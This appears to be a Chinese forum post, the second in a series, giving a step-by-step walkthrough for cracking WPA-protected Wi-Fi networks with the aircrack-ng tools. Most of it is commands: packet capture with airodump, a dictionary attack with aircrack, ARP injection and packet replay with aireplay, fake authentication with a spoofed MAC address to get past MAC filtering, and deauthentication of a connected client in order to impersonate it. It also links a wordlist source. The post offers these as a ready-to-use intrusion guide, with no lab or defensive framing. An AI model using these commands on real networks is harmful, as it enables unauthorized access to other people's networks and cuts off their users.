WPA是一种基于标准的可互操作的WLAN安全性增强解决方案，可大大增强现有以及未来无线局域网系统的数据保护和访问控制水平。WPA源于正在制定中的IEEE802.11i标准并将与之保持前向兼容。部署适当的话，WPA可保证WLAN用户的数据受到保护，并且只有授权的网络用户才可以访问WLAN网络。
 
 
大家如果看了我的基础一的话,我在这里就不罗嗦,直接写命令了,没看了可以看看,在看这文章
文章地址:http://www.china-wifi.com/forum/read.php?tid=612 
 
 
命令:
  我要收集信道为6的AP的数据包,然后把数据保存为meimei,而我网卡的接口是 ath0 
Quote:
./airodump ath0 meimei 6
 
 
 
 
然后呢用字典暴力破解
 
字典下载: http://www.openwall.com/wordlists
 
有一个免费的,有一个收费的字典,40万的密码 
 
Quote:
./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist
 
 
 
 
当然 用字典的成功的机会可大可小
 
那么我们用aireplay来 arp注入破解
 
Quote:
./aireplay -3 -b <AP MAC Address> -h <Client MAC Address> ath0
 
 
 
交互封包攻击
 
Quote:
aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0
 
 
 
 
你也可以假冒认证来破解
 
 
Quote:
./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
 
 
 
如果成功会出现
 
Quote:
 
 
23:47:29  Sending Authentication Request
23:47:29  Authentication successful
23:47:30  Sending Association Request
23:47:30  Association successful :-)
 
 
 
如果失败 也许是对方起用了MAC过滤 这个时候你需要找到一个可以通过认证的MAC地址来欺骗
 
 
 
 
Deauthentication攻击
 
强制一个已经连接的客户端断线,然后冒充对方连上ap
 
Quote:
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0
 
 
 
然后 在用字典破解
 
呵呵 个人理解 它比wep多了个加密

论坛地址:http://www.china-wifi.com/forum/read.php?tid=614